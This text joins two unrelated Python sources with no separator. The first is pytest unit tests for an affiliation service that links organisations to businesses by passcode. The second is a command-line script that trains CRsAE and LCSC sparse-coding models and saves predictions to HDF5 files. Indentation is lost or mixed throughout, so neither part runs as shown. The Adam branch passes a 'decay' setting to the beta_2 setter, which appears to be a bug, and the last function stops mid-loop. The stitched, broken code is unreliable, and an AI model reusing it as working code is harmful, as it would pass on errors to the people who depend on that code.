def test_create_affiliation_with_passcode(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can be created."""
entity_service = factory_entity_service(entity_info=TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
affiliation = AffiliationService.create_affiliation(org_id,
business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
assert affiliation
assert affiliation.entity.identifier == entity_service.identifier
assert affiliation.as_dict()['org']['id'] == org_dictionary['id']
def test_create_affiliation_with_passcode_no_passcode_input(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be created with a passcode entity and no passcode input parameter."""
entity_service = factory_entity_service(entity_info=TestEntityInfo.entity_passcode)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
with pytest.raises(BusinessException) as exception:
AffiliationService.create_affiliation(org_id, business_identifier)
assert exception.value.code == Error.INVALID_USER_CREDENTIALS.name
def test_create_affiliation_exists(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be created affiliation exists."""
entity_service1 = factory_entity_service(entity_info=TestEntityInfo.entity_lear_mock)
entity_dictionary1 = entity_service1.as_dict()
business_identifier1 = entity_dictionary1['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
pass_code = TestEntityInfo.entity_lear_mock['passCode']
# create first row in affiliation table
AffiliationService.create_affiliation(org_id, business_identifier1, pass_code, {})
with pytest.raises(BusinessException) as exception:
AffiliationService.create_affiliation(org_id, business_identifier1, pass_code, {})
assert exception.value.code == Error.INVALID_USER_CREDENTIALS.name
def test_find_affiliated_entities_by_org_id(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can be created."""
entity_service1 = factory_entity_service(entity_info=TestEntityInfo.entity_lear_mock)
entity_dictionary1 = entity_service1.as_dict()
business_identifier1 = entity_dictionary1['businessIdentifier']
entity_service2 = factory_entity_service(entity_info=TestEntityInfo.entity_lear_mock2)
entity_dictionary2 = entity_service2.as_dict()
business_identifier2 = entity_dictionary2['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
# create first row in affiliation table
AffiliationService.create_affiliation(org_id,
business_identifier1,
TestEntityInfo.entity_lear_mock['passCode'],
{})
# create second row in affiliation table
AffiliationService.create_affiliation(org_id,
business_identifier2,
TestEntityInfo.entity_lear_mock2['passCode'],
{})
affiliated_entities = AffiliationService.find_affiliated_entities_by_org_id(org_id)
assert affiliated_entities
assert len(affiliated_entities) == 2
assert affiliated_entities[0]['businessIdentifier'] == entity_dictionary1['businessIdentifier']
def test_find_affiliated_entities_by_org_id_no_org(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be find without org id or org id not exists."""
with pytest.raises(BusinessException) as exception:
AffiliationService.find_affiliated_entities_by_org_id(None)
assert exception.value.code == Error.DATA_NOT_FOUND.name
with pytest.raises(BusinessException) as exception:
AffiliationService.find_affiliated_entities_by_org_id(999999)
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_find_affiliated_entities_by_org_id_no_affiliation(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be find without affiliation."""
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
with patch.object(AffiliationModel, 'find_affiliations_by_org_id', return_value=None):
with pytest.raises(BusinessException) as exception:
AffiliationService.find_affiliated_entities_by_org_id(org_id)
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_delete_affiliation(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an affiliation can be deleted."""
entity_service = factory_entity_service(TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
affiliation = AffiliationService.create_affiliation(org_id,
business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
AffiliationService.delete_affiliation(org_id=org_id, business_identifier=business_identifier)
found_affiliation = AffiliationModel.query.filter_by(id=affiliation.identifier).first()
assert found_affiliation is None
def test_delete_affiliation_no_org(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an affiliation can not be deleted without org."""
entity_service = factory_entity_service(TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
AffiliationService.create_affiliation(org_id,
business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
with pytest.raises(BusinessException) as exception:
AffiliationService.delete_affiliation(org_id=None, business_identifier=business_identifier)
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_delete_affiliation_no_entity(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an affiliation can not be deleted without entity."""
entity_service = factory_entity_service(TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
AffiliationService.create_affiliation(org_id,
business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
with pytest.raises(BusinessException) as exception:
AffiliationService.delete_affiliation(org_id=org_id, business_identifier=None)
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_delete_affiliation_no_affiliation(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an affiliation can not be deleted without affiliation."""
entity_service = factory_entity_service(TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
AffiliationService.create_affiliation(org_id,
business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
AffiliationService.delete_affiliation(org_id=org_id, business_identifier=business_identifier)
with pytest.raises(BusinessException) as exception:
AffiliationService.delete_affiliation(org_id=org_id, business_identifier=business_identifier)
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_delete_affiliation_implicit(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an affiliation can be deleted."""
entity_service = factory_entity_service(TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service(org_type_info=TestOrgTypeInfo.implicit)
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
affiliation = AffiliationService.create_affiliation(org_id,
business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
AffiliationService.delete_affiliation(org_id=org_id, business_identifier=business_identifier)
found_affiliation = AffiliationModel.query.filter_by(id=affiliation.identifier).first()
assert found_affiliation is None
"""
Copyright (c) 2020 Bahareh Tolooshams
Functions to run experiments with CRsAE.
:author: Bahareh Tolooshams
"""
import os
# set this to the GPU name/number you want to use
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
import warnings
warnings.filterwarnings("ignore")
import click
import yaml
import h5py
import numpy as np
import sys
import itertools
import time
from time import gmtime, strftime
from keras.datasets import mnist
from keras.utils import np_utils
sys.path.append("..")
PATH = sys.path[-1]
from src.models.CRsAE import *
from src.models.LCSC import *
from src.models.TLAE import *
from src.prints.parameters import *
from src.plotter.plot_experiment_results import *
from src.run_experiments.extract_results_helpers import *
@click.group(chain=True)
def run_experiment():
pass
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def real(folder_name):
    """Run CRsAE training and prediction on real data."""
    # load model parameters
    print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
    config_m = yaml.safe_load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
    config_d = yaml.safe_load(file)
file.close()
################################################
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
################################################
# configure trainer
print("configure trainer.")
# trainer parameters
print_training_info(folder_name)
crsae.trainer.set_num_epochs(config_m["num_epochs"])
crsae.trainer.set_batch_size(config_m["batch_size"])
crsae.trainer.set_verbose(config_m["verbose"])
crsae.trainer.set_val_split(config_m["val_split"])
crsae.trainer.set_loss(config_m["loss"])
crsae.trainer.set_close(config_m["close"])
crsae.trainer.set_augment(config_m["augment"])
# optimizer
crsae.trainer.set_optimizer(config_m["optimizer"])
crsae.trainer.optimizer.set_lr(config_m["lr"])
# ADAM
if config_m["optimizer"] == "Adam":
if "beta_1" in config_m:
crsae.trainer.optimizer.set_beta_1(config_m["beta_1"])
if "beta_2" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["beta_2"])
if "decay" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["decay"])
crsae.trainer.optimizer.set_amsgrad(config_m["amsgrad"])
# SGD
elif config_m["optimizer"] == "SGD":
if "momentum" in config_m:
crsae.trainer.optimizer.set_momentum(config_m["momentum"])
if "decay" in config_m:
crsae.trainer.optimizer.set_decay(config_m["decay"])
if "nesterov" in config_m:
crsae.trainer.optimizer.set_nesterov(config_m["nesterov"])
if config_m["lambda_trainable"]:
crsae.trainer.optimizer.set_lambda_lr(config_m["lambda_lr"])
# add callbacks
print("add callbacks.")
crsae.trainer.add_best_val_loss_callback(config_m["loss_type"])
crsae.trainer.add_all_epochs_callback(config_m["loss_type"])
crsae.trainer.add_earlystopping_callback(
config_m["min_delta"], config_m["patience"], config_m["loss_type"]
)
if config_m["cycleLR"]:
if config_m["cycle_mode"] == "exp_range":
crsae.trainer.add_cyclic_lr_callback(
config_m["base_lr"],
config_m["max_lr"],
config_m["step_size"],
config_m["cycle_mode"],
config_m["gamma"],
)
################################################
# build model knowing noiseSTD
    # real data: the true noise level is unknown, so use a fixed assumed value
    noiseSTD = 0.01
crsae.build_model(noiseSTD)
# initialize filter
if crsae.trainer.get_close():
H_init = np.load("{}/experiments/{}/data/H_init.npy".format(PATH, folder_name))
crsae.set_H(H_init)
################################################
# get initial H
H_initial = crsae.get_H()
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
g_ch = hf.get("{}".format(config_d["ch"]))
y_train = np.array(g_ch.get("y_train"))
y_test = np.array(g_ch.get("y_test"))
################################################
# get lambda
print("lambda before training:", crsae.get_lambda())
print("noiseSTD before training:", crsae.get_noiseSTD())
################################################
# get initial H
H_init = crsae.get_H()
# get initial lambda
lambda_init = crsae.get_lambda()
################################################
# train
time = crsae.train_and_save(y_train, folder_name)
################################################
# get lambda
print("lambda after training:", crsae.get_lambda())
print("noiseSTD after training:", crsae.get_noiseSTD())
################################################
# predict
print("do prediciton.")
z_test_hat = crsae.encode(y_test)
y_test_hat = crsae.denoise(y_test)
y_test_hat_separate = crsae.separate(y_test)
###############################################
# save prediction
print("save prediction results.")
hf = h5py.File(
"{}/experiments/{}/results/results_prediction_{}.h5".format(
PATH, folder_name, time
),
"w",
)
g_ch = hf.create_group("{}".format(config_d["ch"]))
g_ch.create_dataset(
"z_test_hat", data=z_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat", data=y_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat_separate",
data=y_test_hat_separate,
compression="gzip",
compression_opts=9,
)
g_ch.create_dataset("H_init", data=H_initial)
hf.close()
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def real_series(folder_name):
    """Run CRsAE on real data and predict on a full series."""
    # load model parameters
    print("load model parameters.")
file = open("../experiments/{}/config/config_model.yml".format(folder_name), "rb")
    config_m = yaml.safe_load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open("../experiments/{}/config/config_data.yml".format(folder_name), "rb")
    config_d = yaml.safe_load(file)
file.close()
################################################
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
################################################
# configure trainer
print("configure trainer.")
# trainer parameters
print_training_info(folder_name)
crsae.trainer.set_num_epochs(config_m["num_epochs"])
crsae.trainer.set_batch_size(config_m["batch_size"])
crsae.trainer.set_verbose(config_m["verbose"])
crsae.trainer.set_val_split(config_m["val_split"])
crsae.trainer.set_loss(config_m["loss"])
crsae.trainer.set_close(config_m["close"])
crsae.trainer.set_augment(config_m["augment"])
# optimizer
crsae.trainer.set_optimizer(config_m["optimizer"])
crsae.trainer.optimizer.set_lr(config_m["lr"])
# ADAM
if config_m["optimizer"] == "Adam":
if "beta_1" in config_m:
crsae.trainer.optimizer.set_beta_1(config_m["beta_1"])
if "beta_2" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["beta_2"])
if "decay" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["decay"])
crsae.trainer.optimizer.set_amsgrad(config_m["amsgrad"])
# SGD
elif config_m["optimizer"] == "SGD":
if "momentum" in config_m:
crsae.trainer.optimizer.set_momentum(config_m["momentum"])
if "decay" in config_m:
crsae.trainer.optimizer.set_decay(config_m["decay"])
if "nesterov" in config_m:
crsae.trainer.optimizer.set_nesterov(config_m["nesterov"])
if config_m["lambda_trainable"]:
crsae.trainer.optimizer.set_lambda_lr(config_m["lambda_lr"])
# add callbacks
print("add callbacks.")
crsae.trainer.add_best_val_loss_callback(config_m["loss_type"])
crsae.trainer.add_all_epochs_callback(config_m["loss_type"])
crsae.trainer.add_earlystopping_callback(
config_m["min_delta"], config_m["patience"], config_m["loss_type"]
)
if config_m["cycleLR"]:
if config_m["cycle_mode"] == "exp_range":
crsae.trainer.add_cyclic_lr_callback(
config_m["base_lr"],
config_m["max_lr"],
config_m["step_size"],
config_m["cycle_mode"],
config_m["gamma"],
)
################################################
# load data
print("load data.")
hf = h5py.File("../experiments/{}/data/data.h5".format(folder_name), "r")
g_ch = hf.get("{}".format(config_d["ch"]))
y_train = np.array(g_ch.get("y_train"))
y_test = np.array(g_ch.get("y_test"))
y_series = np.array(g_ch.get("y_series"))
length_of_data = np.array(g_ch.get("length_of_data"))
noiseSTD = np.array(g_ch.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model knowing noiseSTD
crsae.build_model(noiseSTD)
# initialize filter
if crsae.trainer.get_close():
H_init = np.load("../experiments/{}/data/H_init.npy".format(folder_name))
crsae.set_H(H_init)
################################################
# build model for series prediction
# create CRsAE object
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae_series = CRsAE_1d(
length_of_data,
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae_series = CRsAE_1d(
length_of_data,
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae_series = CRsAE_2d(
length_of_data,
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae_series = CRsAE_2d(
length_of_data,
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
# build model knowing noiseSTD
crsae_series.build_model(noiseSTD)
################################################
# get lambda
print("lambda before training:", crsae.get_lambda())
print("noiseSTD before training:", crsae.get_noiseSTD())
################################################
# get initial H
H_init = crsae.get_H()
# get initial lambda
lambda_init = crsae.get_lambda()
################################################
# train
time = crsae.train_and_save(y_train, folder_name)
################################################
# get lambda
print("lambda after training:", crsae.get_lambda())
print("noiseSTD after training:", crsae.get_noiseSTD())
################################################
# predict
print("do prediciton.")
if (config_d["num_test"]) != 0:
z_test_hat = crsae.encode(y_test)
y_test_hat = crsae.denoise(y_test)
y_test_hat_separate = crsae.separate(y_test)
else:
z_test_hat = crsae.encode(y_train)
y_test_hat = crsae.denoise(y_train)
y_test_hat_separate = crsae.separate(y_train)
H_learned = crsae.get_H()
lambda_learned = crsae.get_lambda()
crsae_series.set_H(H_learned)
crsae_series.set_lambda(lambda_learned)
z_series_hat = crsae_series.encode(y_series)
y_series_hat = crsae_series.denoise(y_series)
y_series_hat_separate = crsae_series.separate(y_series)
###############################################
# save prediction
print("save prediction results.")
hf = h5py.File(
"../experiments/{}/results/results_prediction_{}.h5".format(folder_name, time),
"w",
)
g_ch = hf.create_group("{}".format(config_d["ch"]))
g_ch.create_dataset(
"z_test_hat", data=z_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat", data=y_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"z_series_hat", data=z_series_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_series_hat", data=y_series_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat_separate",
data=y_test_hat_separate,
compression="gzip",
compression_opts=9,
)
g_ch.create_dataset(
"y_series_hat_separate",
data=y_series_hat_separate,
compression="gzip",
compression_opts=9,
)
g_ch.create_dataset("H_init", data=H_init)
hf.close()
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def simulated(folder_name):
    """Run CRsAE training and prediction on simulated data."""
    # load model parameters
    print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
    config_m = yaml.safe_load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
    config_d = yaml.safe_load(file)
file.close()
################################################
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
################################################
# configure trainer
print("configure trainer.")
# trainer parameters
print_training_info(folder_name)
crsae.trainer.set_num_epochs(config_m["num_epochs"])
crsae.trainer.set_batch_size(config_m["batch_size"])
crsae.trainer.set_verbose(config_m["verbose"])
crsae.trainer.set_val_split(config_m["val_split"])
crsae.trainer.set_loss(config_m["loss"])
crsae.trainer.set_close(config_m["close"])
crsae.trainer.set_augment(config_m["augment"])
# optimizer
crsae.trainer.set_optimizer(config_m["optimizer"])
crsae.trainer.optimizer.set_lr(config_m["lr"])
# ADAM
if config_m["optimizer"] == "Adam":
if "beta_1" in config_m:
crsae.trainer.optimizer.set_beta_1(config_m["beta_1"])
if "beta_2" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["beta_2"])
if "decay" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["decay"])
crsae.trainer.optimizer.set_amsgrad(config_m["amsgrad"])
# SGD
elif config_m["optimizer"] == "SGD":
if "momentum" in config_m:
crsae.trainer.optimizer.set_momentum(config_m["momentum"])
if "decay" in config_m:
crsae.trainer.optimizer.set_decay(config_m["decay"])
if "nesterov" in config_m:
crsae.trainer.optimizer.set_nesterov(config_m["nesterov"])
if config_m["lambda_trainable"]:
crsae.trainer.optimizer.set_lambda_lr(config_m["lambda_lr"])
# add callbacks
print("add callbacks.")
crsae.trainer.add_best_val_loss_callback(config_m["loss_type"])
crsae.trainer.add_all_epochs_callback(config_m["loss_type"])
crsae.trainer.add_earlystopping_callback(
config_m["min_delta"], config_m["patience"], config_m["loss_type"]
)
if config_m["cycleLR"]:
if config_m["cycle_mode"] == "exp_range":
crsae.trainer.add_cyclic_lr_callback(
config_m["base_lr"],
config_m["max_lr"],
config_m["step_size"],
config_m["cycle_mode"],
config_m["gamma"],
)
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
y_train_noisy = np.array(hf.get("y_train_noisy"))
y_test_noisy = np.array(hf.get("y_test_noisy"))
noiseSTD = np.array(hf.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model knowing noiseSTD
crsae.build_model(noiseSTD)
# initialize filter
if crsae.trainer.get_close():
H_true = np.load("{}/experiments/{}/data/H_true.npy".format(PATH, folder_name))
H_noisestd = 0.5 * np.std(np.squeeze(H_true), axis=0)
        print("H_noisestd:", H_noisestd)
        # resample a noisy initialization until its distance from the true
        # dictionary falls in the [0.4, 0.5] range
        flag = True
        while flag:
            crsae.set_H(H_true, H_noisestd)
            dist_true_learned, temp = get_err_h1_h2(H_true, crsae.get_H())
            if np.min(dist_true_learned) >= 0.4 and np.max(dist_true_learned) <= 0.5:
                flag = False
# # this is temp
# H_init = np.load(
# "{}/experiments/{}/data/H_init.npy".format(PATH, folder_name)
# )
# crsae.set_H(H_init)
dist_true_learned, temp = get_err_h1_h2(H_true, crsae.get_H())
print("initial distance err:", dist_true_learned)
################################################
z_test = np.array(hf.get("z_test"))
l1_norm_z_test = np.mean(np.sum(np.sum(np.abs(z_test), axis=2), axis=1), axis=0)
print("l1_norm from true code:", l1_norm_z_test)
lambda_estimate = (
(config_m["input_dim"] - config_m["dictionary_dim"] + 1) * config_m["num_conv"]
) / l1_norm_z_test
print("lambda estimate from true code:", lambda_estimate)
y_test = np.array(hf.get("y_test"))
z_test_from_FISTA = crsae.encode(y_test)
l1_norm_z_test_from_FISTA = np.mean(
np.sum(np.sum(np.abs(z_test_from_FISTA), axis=2), axis=1), axis=0
)
print("l1_norm from code through FISTA:", l1_norm_z_test_from_FISTA)
lambda_estimate_from_FISTA = (
(config_m["input_dim"] - config_m["dictionary_dim"] + 1) * config_m["num_conv"]
) / l1_norm_z_test_from_FISTA
print("lambda estimate from code through FISTA:", lambda_estimate_from_FISTA)
################################################
# get lambda
print("lambda before training:", crsae.get_lambda())
print("noiseSTD before training:", crsae.get_noiseSTD())
################################################
# get initial H
H_init = crsae.get_H()
# get initial lambda
lambda_init = crsae.get_lambda()
################################################
# train
time = crsae.train_and_save(y_train_noisy, folder_name)
################################################
# # save results
# time = crsae.save_results(folder_name)
################################################
# get lambda
print("lambda after training:", crsae.get_lambda())
print("noiseSTD after training:", crsae.get_noiseSTD())
################################################
# predict
print("do prediciton.")
z_test_hat = crsae.encode(y_test_noisy)
y_test_hat = crsae.denoise(y_test_noisy)
y_test_hat_separate = crsae.separate(y_test_noisy)
###############################################
# save prediction
print("save prediction results.")
hf = h5py.File(
"{}/experiments/{}/results/results_prediction_{}.h5".format(
PATH, folder_name, time
),
"w",
)
g_ch = hf.create_group("{}".format(config_d["ch"]))
g_ch.create_dataset(
"z_test_hat", data=z_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat", data=y_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat_separate",
data=y_test_hat_separate,
compression="gzip",
compression_opts=9,
)
g_ch.create_dataset("H_init", data=H_init)
g_ch.create_dataset("lambda_init", data=lambda_init)
hf.close()
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def lcsc_simulated(folder_name):
    """Run LCSC training and prediction on simulated data."""
    # load model parameters
    print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
    config_m = yaml.safe_load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
    config_d = yaml.safe_load(file)
file.close()
################################################
for p in range(10):
        # create LCSC object
        print("create LCSC object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
lcsc = LCSC_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
)
else:
print("ERROR: 2D version of LCSC is not implemented.")
################################################
# configure trainer
print("configure trainer.")
# trainer parameters
print_training_info(folder_name)
lcsc.trainer.set_num_epochs(config_m["num_epochs"])
lcsc.trainer.set_batch_size(config_m["batch_size"])
lcsc.trainer.set_verbose(config_m["verbose"])
lcsc.trainer.set_val_split(config_m["val_split"])
lcsc.trainer.set_loss(config_m["loss"])
lcsc.trainer.set_close(config_m["close"])
lcsc.trainer.set_augment(config_m["augment"])
# optimizer
lcsc.trainer.set_optimizer(config_m["optimizer"])
lcsc.trainer.optimizer.set_lr(config_m["lr"])
lcsc.trainer.optimizer.set_amsgrad(config_m["amsgrad"])
# add callbacks
print("add callbacks.")
lcsc.trainer.add_best_val_loss_callback(config_m["loss_type"])
lcsc.trainer.add_all_epochs_callback(config_m["loss_type"])
lcsc.trainer.add_earlystopping_callback(
config_m["min_delta"], config_m["patience"], config_m["loss_type"]
)
if config_m["cycleLR"]:
lcsc.trainer.add_cyclic_lr_callback(
config_m["base_lr"], config_m["max_lr"], config_m["step_size"]
)
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
y_train_noisy = np.array(hf.get("y_train_noisy"))
y_test_noisy = np.array(hf.get("y_test_noisy"))
noiseSTD = np.array(hf.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model
lcsc.build_model()
# initialize filter
if lcsc.trainer.get_close():
We_true = np.load(
"{}/experiments/{}/data/H_true.npy".format(PATH, folder_name)
)
weights_noisestd = 0.5 * np.std(np.squeeze(We_true), axis=0)
            print("weights_noisestd:", weights_noisestd)
We_noisy = np.copy(We_true)
for n in range(config_m["num_conv"]):
We_noisy[:, :, n] += weights_noisestd[n] * np.random.randn(
lcsc.get_dictionary_dim(), 1
)
